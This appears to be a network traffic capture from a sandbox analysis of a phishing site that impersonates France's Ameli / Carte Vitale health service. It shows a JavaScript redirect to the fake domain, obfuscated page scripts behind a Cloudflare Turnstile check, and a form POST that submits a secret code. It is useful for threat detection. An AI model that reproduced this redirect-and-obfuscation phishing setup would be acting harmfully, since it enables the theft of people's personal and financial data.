                        2024-07-03 12:39:06 UTC255INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 65 66 65 72 72 65 72 27 20 63 6f 6e 74 65 6e 74 3d 27 6f 72 69 67 69 6e 27 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 22 68 74 74 70 73 3a 2f 2f 63 61 72 74 65 76 69 74 61 6c 65 2d 61 6d 65 6c 69 2e 73 61 6e 74 65 61 73 73 75 72 65 73 2d 69 6e 66 6f 72 6d 61 74 69 6f 6e 73 2e 65 75 2f 46 69 34 62 50 79 2d 4e 33 52 74 76 2d 35 7a 4f 67 38 2d 51 4e 57 75 6a 2d 73 62 58 45 6c 2d 62 6c 47 68 69 2d 34 43 57 49 6a 2d 7a 44 61 63 46 2d 50 6e 2f 69 6e 64 65 78 2e 68 74 6d 6c 22 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                        Data Ascii: <!doctype html><html><head><meta name='referrer' content='origin'></head><body><script>window.location.replace("https://cartevitale-ameli.santeassures-informations.eu/Fi4bPy-N3Rtv-5zOg8-QNWuj-sbXEl-blGhi-4CWIj-zDacF-Pn/index.html");</script></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        5192.168.2.649724102.48.55.1784434508C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:07 UTC850OUTGET /Fi4bPy-N3Rtv-5zOg8-QNWuj-sbXEl-blGhi-4CWIj-zDacF-Pn/index.html HTTP/1.1
                        Host: cartevitale-ameli.santeassures-informations.eu
                        Connection: keep-alive
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-mobile: ?0
                        sec-ch-ua-platform: "Windows"
                        Upgrade-Insecure-Requests: 1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Sec-Fetch-Site: same-origin
                        Sec-Fetch-Mode: navigate
                        Sec-Fetch-Dest: document
                        Referer: https://cartevitale-ameli.santeassures-informations.eu/
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        Cookie: PHPSESSID=4rgtbdcmd3bkf4hrnj5nq3tr4p
                        2024-07-03 12:39:08 UTC349INHTTP/1.1 200 OK
                        Date: Wed, 03 Jul 2024 12:39:05 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        Vary: Accept-Encoding
                        Referrer-Policy: no-referrer
                        Strict-Transport-Security: max-age=604800
                        2024-07-03 12:39:08 UTC16035INData Raw: 31 65 64 61 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 61 20 68 72 65 66 3d 22 2e 2f 62 6c 61 63 6b 68 6f 6c 65 22 3e 3c 2f 61 3e 0d 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 5f 30 78 63 38 38 65 3d 5b 22 22 2c 22 73 70 6c 69 74 22 2c 22 30 31 32 33 34 35 36 37 38 39 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 2b 2f 22 2c 22 73 6c 69 63 65 22 2c 22 69 6e 64 65 78 4f 66 22 2c 22 22 2c 22 22 2c 22 2e 22 2c 22 70 6f 77 22 2c 22 72 65 64 75 63 65 22 2c 22 72 65 76 65 72 73 65 22 2c 22 30 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 65 34 35 63 28 64 2c 65 2c 66 29 7b 76 61 72 20 67 3d 5f 30 78
                        Data Ascii: 1eda<html><head></head><body><a href="./blackhole"></a><script>var _0xc88e=["","split","0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/","slice","indexOf","","",".","pow","reduce","reverse","0"];function _0xe45c(d,e,f){var g=_0x
                        2024-07-03 12:39:08 UTC16384INData Raw: 43 5a 43 43 77 56 43 56 56 77 56 5a 43 5a 43 77 56 43 43 56 77 43 5a 43 5a 77 43 56 5a 56 77 56 43 56 56 77 56 43 56 56 77 43 56 56 56 77 56 5a 43 43 43 77 56 5a 43 43 5a 77 56 56 56 43 5a 77 56 56 5a 5a 56 0d 0a 32 30 30 30 0d 0a 77 56 56 56 56 77 43 5a 43 43 77 43 56 56 5a 77 56 56 5a 56 56 77 43 56 43 5a 77 56 56 43 5a 43 77 43 5a 43 43 77 43 5a 43 5a 77 56 5a 56 43 5a 77 56 56 56 5a 43 77 56 56 56 56 43 77 56 43 56 5a 77 56 56 5a 56 56 77 56 43 43 56 77 56 56 43 5a 43 77 43 5a 43 43 77 43 5a 43 5a 77 56 5a 5a 56 5a 77 56 56 5a 5a 56 77 56 56 5a 5a 43 77 56 56 56 43 56 77 56 5a 56 5a 56 77 56 56 5a 56 56 77 56 56 5a 56 43 77 56 56 5a 5a 43 77 56 56 56 43 56 77 56 43 56 5a 77 56 5a 43 5a 5a 77 43 5a 5a 43 77 56 43 43 56 77 56 56 56 43 56 77 43 5a 5a 5a
                        Data Ascii: CZCCwVCVVwVZCZCwVCCVwCZCZwCVZVwVCVVwVCVVwCVVVwVZCCCwVZCCZwVVVCZwVVZZV2000wVVVVwCZCCwCVVZwVVZVVwCVCZwVVCZCwCZCCwCZCZwVZVCZwVVVZCwVVVVCwVCVZwVVZVVwVCCVwVVCZCwCZCCwCZCZwVZZVZwVVZZVwVVZZCwVVVCVwVZVZVwVVZVVwVVZVCwVVZZCwVVVCVwVCVZwVZCZZwCZZCwVCCVwVVVCVwCZZZ
                        2024-07-03 12:39:08 UTC16384INData Raw: 5a 5a 77 56 56 56 43 5a 77 56 56 56 43 56 77 56 56 56 56 43 77 56 56 56 5a 43 77 56 56 5a 43 56 77 56 56 5a 5a 56 77 56 43 56 5a 77 56 43 56 56 77 56 56 43 43 56 77 56 5a 43 5a 43 77 43 56 56 56 77 56 56 56 43 56 77 56 56 56 56 43 77 56 56 43 56 5a 77 56 0d 0a 31 30 30 30 0d 0a 56 43 56 43 77 56 56 5a 43 43 77 56 56 5a 5a 56 77 56 56 56 43 56 77 56 56 56 56 77 56 56 5a 5a 5a 77 43 56 43 5a 77 56 56 56 5a 56 77 56 56 5a 5a 56 77 56 56 43 5a 56 77 56 56 56 56 77 56 5a 43 43 43 77 56 56 5a 43 43 77 56 5a 43 43 5a 77 56 56 56 43 5a 77 56 56 56 43 5a 77 56 56 56 56 77 56 56 56 43 56 77 56 56 43 56 43 77 56 5a 43 43 43 77 56 56 56 5a 43 77 56 56 56 5a 56 77 56 56 56 43 5a 77 56 56 56 43 56 77 56 56 56 56 43 77 56 56 56 43 43 77 56 5a 43 43 43 77 56 56 56 43 56
                        Data Ascii: ZZwVVVCZwVVVCVwVVVVCwVVVZCwVVZCVwVVZZVwVCVZwVCVVwVVCCVwVZCZCwCVVVwVVVCVwVVVVCwVVCVZwV1000VCVCwVVZCCwVVZZVwVVVCVwVVVVwVVZZZwCVCZwVVVZVwVVZZVwVVCZVwVVVVwVZCCCwVVZCCwVZCCZwVVVCZwVVVCZwVVVVwVVVCVwVVCVCwVZCCCwVVVZCwVVVZVwVVVCZwVVVCVwVVVVCwVVVCCwVZCCCwVVVCV
                        2024-07-03 12:39:08 UTC2537INData Raw: 77 56 56 56 56 43 77 56 56 56 56 77 56 56 56 5a 56 77 56 56 43 5a 5a 77 43 56 43 5a 77 56 56 56 5a 56 77 56 5a 43 43 5a 77 56 56 43 5a 5a 77 56 56 5a 56 43 77 56 56 5a 56 5a 77 56 5a 43 43 5a 77 56 56 56 43 56 77 56 56 56 5a 43 77 56 56 56 56 43 77 43 5a 5a 5a 77 56 56 56 43 43 77 56 56 56 43 5a 77 56 56 5a 5a 56 77 56 56 56 0d 0a 39 36 65 0d 0a 56 43 77 43 43 5a 56 77 56 56 5a 56 5a 77 56 56 5a 5a 56 77 56 56 56 5a 56 77 56 56 56 43 56 77 43 56 56 56 77 56 56 56 56 77 56 56 5a 5a 43 77 56 56 56 5a 43 77 56 56 56 43 43 77 56 56 56 5a 56 77 56 56 5a 5a 5a 77 56 5a 5a 43 56 77 43 43 56 56 77 43 43 43 5a 77 43 56 43 5a 77 43 5a 5a 43 77 43 56 56 56 77 56 56 56 56 77 56 56 43 5a 5a 77 56 5a 43 43 5a 77 56 56 56 56 43 77 56 56 56 56 77 56 56 5a 5a 5a 77 56 5a
                        Data Ascii: wVVVVCwVVVVwVVVZVwVVCZZwCVCZwVVVZVwVZCCZwVVCZZwVVZVCwVVZVZwVZCCZwVVVCVwVVVZCwVVVVCwCZZZwVVVCCwVVVCZwVVZZVwVVV96eVCwCCZVwVVZVZwVVZZVwVVVZVwVVVCVwCVVVwVVVVwVVZZCwVVVZCwVVVCCwVVVZVwVVZZZwVZZCVwCCVVwCCCZwCVCZwCZZCwCVVVwVVVVwVVCZZwVZCCZwVVVVCwVVVVwVVZZZwVZ


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        6192.168.2.649723102.48.55.1784434508C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:09 UTC749OUTPOST /index.php?authentification HTTP/1.1
                        Host: cartevitale-ameli.santeassures-informations.eu
                        Connection: keep-alive
                        Content-Length: 184
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-platform: "Windows"
                        sec-ch-ua-mobile: ?0
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWPSuNQoNtJ8oyPDV
                        Accept: */*
                        Origin: https://cartevitale-ameli.santeassures-informations.eu
                        Sec-Fetch-Site: same-origin
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: empty
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        Cookie: PHPSESSID=4rgtbdcmd3bkf4hrnj5nq3tr4p
                        2024-07-03 12:39:09 UTC184OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 57 50 53 75 4e 51 6f 4e 74 4a 38 6f 79 50 44 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 65 63 75 72 69 74 61 73 5f 73 65 63 72 65 74 5f 63 6f 64 65 22 0d 0a 0d 0a 33 63 36 66 38 65 65 37 62 37 37 65 62 34 38 35 35 39 30 36 62 62 31 61 63 62 61 38 34 65 63 61 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 57 50 53 75 4e 51 6f 4e 74 4a 38 6f 79 50 44 56 2d 2d 0d 0a
                        Data Ascii: ------WebKitFormBoundaryWPSuNQoNtJ8oyPDVContent-Disposition: form-data; name="securitas_secret_code"3c6f8ee7b77eb4855906bb1acba84eca------WebKitFormBoundaryWPSuNQoNtJ8oyPDV--
                        2024-07-03 12:39:09 UTC317INHTTP/1.1 200 OK
                        Date: Wed, 03 Jul 2024 12:39:07 GMT
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 4
                        Connection: close
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        Referrer-Policy: no-referrer
                        Strict-Transport-Security: max-age=604800
                        2024-07-03 12:39:09 UTC4INData Raw: 74 72 75 65
                        Data Ascii: true


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        7192.168.2.6497252.18.97.153443
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:09 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                        Connection: Keep-Alive
                        Accept: */*
                        Accept-Encoding: identity
                        User-Agent: Microsoft BITS/7.8
                        Host: fs.microsoft.com
                        2024-07-03 12:39:09 UTC466INHTTP/1.1 200 OK
                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                        Content-Type: application/octet-stream
                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                        Server: ECAcc (lpl/EF06)
                        X-CID: 11
                        X-Ms-ApiVersion: Distribute 1.2
                        X-Ms-Region: prod-neu-z1
                        Cache-Control: public, max-age=99101
                        Date: Wed, 03 Jul 2024 12:39:09 GMT
                        Connection: close
                        X-CID: 2


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        8192.168.2.649726102.48.55.1784434508C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:10 UTC810OUTGET /Fi4bPy-N3Rtv-5zOg8-QNWuj-sbXEl-blGhi-4CWIj-zDacF-Pn/index.html HTTP/1.1
                        Host: cartevitale-ameli.santeassures-informations.eu
                        Connection: keep-alive
                        Cache-Control: max-age=0
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-mobile: ?0
                        sec-ch-ua-platform: "Windows"
                        Upgrade-Insecure-Requests: 1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                        Sec-Fetch-Site: same-origin
                        Sec-Fetch-Mode: navigate
                        Sec-Fetch-Dest: document
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        Cookie: PHPSESSID=4rgtbdcmd3bkf4hrnj5nq3tr4p
                        2024-07-03 12:39:10 UTC349INHTTP/1.1 200 OK
                        Date: Wed, 03 Jul 2024 12:39:08 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        Vary: Accept-Encoding
                        Referrer-Policy: no-referrer
                        Strict-Transport-Security: max-age=604800
                        2024-07-03 12:39:10 UTC16035INData Raw: 31 65 64 61 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 3c 68 65 61 64 3e 0d 0a 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 3c 73 63 72 69 70 74 20 69 64 3d 22 68 63 66 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 3f 6f 6e 6c 6f 61 64 3d 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 22 20 64 65 66 65 72 3e 3c 2f 73 63 72 69 70 74 3e 20 0d 0a 20 3c 73 74 79 6c 65 3e 0d 0a 20 23 66 70 67 63 72 74 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 63 6f 6c 6f 72 3a 23 35 62 35 62 35 62 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 70
                        Data Ascii: 1eda<html> <head> <link rel="icon" href="data:,"> <script id="hcf" src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback" defer></script> <style> #fpgcrt{white-space:nowrap;color:#5b5b5b;position:absolute;p
                        2024-07-03 12:39:10 UTC16384INData Raw: 57 4f 49 57 57 42 49 57 43 57 49 43 43 76 49 43 57 4f 49 43 57 4a 49 43 43 57 49 57 57 4f 49 57 57 4f 49 43 57 4a 49 43 43 73 49 43 43 76 49 43 57 42 49 43 43 4a 49 43 4a 42 49 43 43 76 49 43 57 4a 49 57 57 0d 0a 32 30 30 30 0d 0a 42 49 57 4a 4f 49 57 42 4a 49 57 42 57 49 57 4a 4f 49 43 4f 73 49 57 4a 4f 49 43 57 76 49 43 57 4a 49 43 43 76 49 57 4a 4f 49 43 4f 4f 49 57 42 4a 49 57 57 4f 49 43 57 4a 49 43 43 73 49 43 43 76 49 43 57 42 49 43 43 4a 49 43 4a 42 49 43 43 76 49 43 57 4a 49 57 43 57 49 43 43 42 49 43 4f 4a 49 43 43 43 49 43 43 76 49 43 4a 42 49 57 4a 4f 49 57 43 43 49 57 43 42 49 57 43 4f 49 57 43 76 49 57 4f 4f 49 57 4f 4a 49 57 4f 43 49 57 4f 57 49 57 43 4f 49 57 43 4f 49 57 43 4f 49 57 57 42 49 57 43 57 49 43 43 76 49 43 43 43 49 57 7a 57 49
                        Data Ascii: WOIWWBIWCWICCvICWOICWJICCWIWWOIWWOICWJICCsICCvICWBICCJICJBICCvICWJIWW2000BIWJOIWBJIWBWIWJOICOsIWJOICWvICWJICCvIWJOICOOIWBJIWWOICWJICCsICCvICWBICCJICJBICCvICWJIWCWICCBICOJICCCICCvICJBIWJOIWCCIWCBIWCOIWCvIWOOIWOJIWOCIWOWIWCOIWCOIWCOIWWBIWCWICCvICCCIWzWI
                        2024-07-03 12:39:10 UTC2684INData Raw: 49 57 42 73 49 43 43 43 49 43 57 76 49 43 57 76 49 43 57 4a 49 43 4a 73 49 43 43 76 49 57 43 57 49 43 4a 42 49 43 4a 76 49 43 57 57 49 43 43 4f 49 57 42 4a 49 57 57 4f 49 57 43 4a 49 57 43 76 49 57 57 42 49 57 4f 73 49 57 4a 4f 49 43 42 4a 49 7a 7a 49 43 0d 0a 61 31 39 0d 0a 42 4a 49 7a 7a 49 43 57 4f 49 57 7a 43 49 57 7a 57 49 57 73 4f 49 57 57 4f 49 57 57 42 49 57 4f 73 49 7a 7a 49 43 4f 43 49 43 57 42 49 43 43 57 49 43 4a 76 49 43 43 43 49 43 4f 43 49 57 43 57 49 43 43 43 49 43 43 57 49 43 57 76 49 43 43 43 49 43 4a 42 49 43 4a 76 49 57 4a 4f 49 57 42 4a 49 57 4a 4f 49 57 57 4f 49 43 57 4a 49 43 4f 57 49 43 57 4a 49 43 43 57 49 43 43 76 49 57 57 42 49 57 4a 4f 49 57 42 4a 49 57 42 57 49 57 4a 4f 49 43 4f 73 49 57 4a 4f 49 43 57 43 49 43 4f 4a 49 43 4a
                        Data Ascii: IWBsICCCICWvICWvICWJICJsICCvIWCWICJBICJvICWWICCOIWBJIWWOIWCJIWCvIWWBIWOsIWJOICBJIzzICa19BJIzzICWOIWzCIWzWIWsOIWWOIWWBIWOsIzzICOCICWBICCWICJvICCCICOCIWCWICCCICCWICWvICCCICJBICJvIWJOIWBJIWJOIWWOICWJICOWICWJICCWICCvIWWBIWJOIWBJIWBWIWJOICOsIWJOICWCICOJICJ


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        9192.168.2.6497282.18.97.153443
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:10 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                        Connection: Keep-Alive
                        Accept: */*
                        Accept-Encoding: identity
                        If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                        Range: bytes=0-2147483646
                        User-Agent: Microsoft BITS/7.8
                        Host: fs.microsoft.com
                        2024-07-03 12:39:10 UTC534INHTTP/1.1 200 OK
                        Content-Type: application/octet-stream
                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                        ApiVersion: Distribute 1.1
                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                        X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                        Cache-Control: public, max-age=98987
                        Date: Wed, 03 Jul 2024 12:39:10 GMT
                        Content-Length: 55
                        Connection: close
                        X-CID: 2
                        2024-07-03 12:39:10 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                        Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        10192.168.2.649727102.48.55.1784434508C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:10 UTC628OUTGET /favicon.ico HTTP/1.1
                        Host: cartevitale-ameli.santeassures-informations.eu
                        Connection: keep-alive
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-mobile: ?0
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        sec-ch-ua-platform: "Windows"
                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                        Sec-Fetch-Site: same-origin
                        Sec-Fetch-Mode: no-cors
                        Sec-Fetch-Dest: image
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        Cookie: PHPSESSID=4rgtbdcmd3bkf4hrnj5nq3tr4p


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        11192.168.2.649731104.17.2.1844434508C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:11 UTC539OUTGET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1
                        Host: challenges.cloudflare.com
                        Connection: keep-alive
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        sec-ch-ua-mobile: ?0
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        sec-ch-ua-platform: "Windows"
                        Accept: */*
                        Sec-Fetch-Site: cross-site
                        Sec-Fetch-Mode: no-cors
                        Sec-Fetch-Dest: script
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-07-03 12:39:11 UTC336INHTTP/1.1 302 Found
                        Date: Wed, 03 Jul 2024 12:39:11 GMT
                        Content-Length: 0
                        Connection: close
                        access-control-allow-origin: *
                        cache-control: max-age=300, public
                        cross-origin-resource-policy: cross-origin
                        location: /turnstile/v0/g/d2a97f6b6ec9/api.js
                        Server: cloudflare
                        CF-RAY: 89d6efd7ef1d8c17-EWR
                        alt-svc: h3=":443"; ma=86400


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        12192.168.2.649730102.48.55.1784434508C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-07-03 12:39:11 UTC442OUTGET /index.php?authentification HTTP/1.1
                        Host: cartevitale-ameli.santeassures-informations.eu
                        Connection: keep-alive
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        Accept: */*
                        Sec-Fetch-Site: none
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: empty
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        Cookie: PHPSESSID=4rgtbdcmd3bkf4hrnj5nq3tr4p
                        2024-07-03 12:39:12 UTC349INHTTP/1.1 200 OK
                        Date: Wed, 03 Jul 2024 12:39:09 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        Vary: Accept-Encoding
                        Referrer-Policy: no-referrer
                        Strict-Transport-Security: max-age=604800
                        2024-07-03 12:39:12 UTC16035INData Raw: 31 65 64 61 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 3c 68 65 61 64 3e 0d 0a 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 3c 73 63 72 69 70 74 20 69 64 3d 22 68 63 66 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 3f 6f 6e 6c 6f 61 64 3d 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 22 20 64 65 66 65 72 3e 3c 2f 73 63 72 69 70 74 3e 20 0d 0a 20 3c 73 74 79 6c 65 3e 0d 0a 20 23 66 70 67 63 72 74 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 63 6f 6c 6f 72 3a 23 35 62 35 62 35 62 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 70
                        Data Ascii: 1eda<html> <head> <link rel="icon" href="data:,"> <script id="hcf" src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback" defer></script> <style> #fpgcrt{white-space:nowrap;color:#5b5b5b;position:absolute;p
                        2024-07-03 12:39:12 UTC16384INData Raw: 65 76 7a 59 65 59 54 7a 54 65 59 54 54 54 65 59 54 7a 76 65 61 7a 76 65 76 61 61 65 61 7a 61 65 76 61 76 65 59 54 59 54 65 59 54 54 76 65 59 54 59 59 65 59 54 54 61 65 59 54 59 54 65 59 54 7a 76 65 76 7a 61 0d 0a 32 30 30 30 0d 0a 65 76 76 54 65 76 59 61 65 76 76 54 65 76 7a 76 65 7a 76 54 65 59 76 59 65 59 54 76 7a 65 59 54 7a 54 65 59 54 7a 76 65 76 59 7a 65 7a 76 76 65 76 59 7a 65 59 54 61 76 65 76 61 76 65 59 54 7a 59 65 59 54 76 7a 65 59 54 59 61 65 59 54 59 59 65 59 54 7a 76 65 76 7a 59 65 76 7a 54 65 76 61 76 65 76 7a 54 65 76 7a 76 65 7a 76 54 65 59 76 59 65 59 54 61 76 65 7a 76 76 65 59 54 76 7a 65 59 54 7a 54 65 59 54 7a 76 65 61 7a 76 65 7a 54 54 65 61 7a 61 65 7a 76 54 65 59 76 59 65 59 54 7a 54 65 59 54 54 76 65 59 54 7a 76 65 59 54 7a 7a 65
                        Data Ascii: evzYeYTzTeYTTTeYTzveazvevaaeazaevaveYTYTeYTTveYTYYeYTTaeYTYTeYTzvevza2000evvTevYaevvTevzvezvTeYvYeYTvzeYTzTeYTzvevYzezvvevYzeYTavevaveYTzYeYTvzeYTYaeYTYYeYTzvevzYevzTevavevzTevzvezvTeYvYeYTavezvveYTvzeYTzTeYTzveazvezTTeazaezvTeYvYeYTzTeYTTveYTzveYTzze
                        2024-07-03 12:39:12 UTC7203INData Raw: 59 54 54 76 65 59 54 7a 76 65 7a 7a 59 65 59 54 7a 7a 65 59 54 54 59 65 59 54 59 59 65 59 54 76 76 65 61 59 59 65 61 61 7a 65 59 54 7a 54 65 61 61 7a 65 59 54 76 54 65 76 7a 59 65 59 54 7a 54 65 76 61 54 65 61 61 7a 65 76 61 76 65 59 54 7a 54 65 59 54 54 0d 0a 31 30 30 30 0d 0a 76 65 59 54 59 61 65 59 54 54 76 65 61 61 7a 65 59 54 7a 59 65 59 54 54 76 65 76 61 54 65 76 61 76 65 7a 54 59 65 7a 54 61 65 76 7a 76 65 76 61 54 65 59 54 7a 76 65 76 61 76 65 59 54 54 54 65 59 54 76 76 65 59 54 76 59 65 59 54 76 59 65 59 54 54 76 65 59 54 54 54 65 59 54 7a 76 65 76 7a 59 65 61 61 7a 65 76 7a 76 65 76 61 54 65 61 61 7a 65 76 61 76 65 59 54 54 54 65 59 54 76 76 65 59 54 76 59 65 59 54 76 59 65 59 54 54 76 65 59 54 54 54 65 59 54 7a 76 65 76 7a 59 65 59 54 7a 54 65
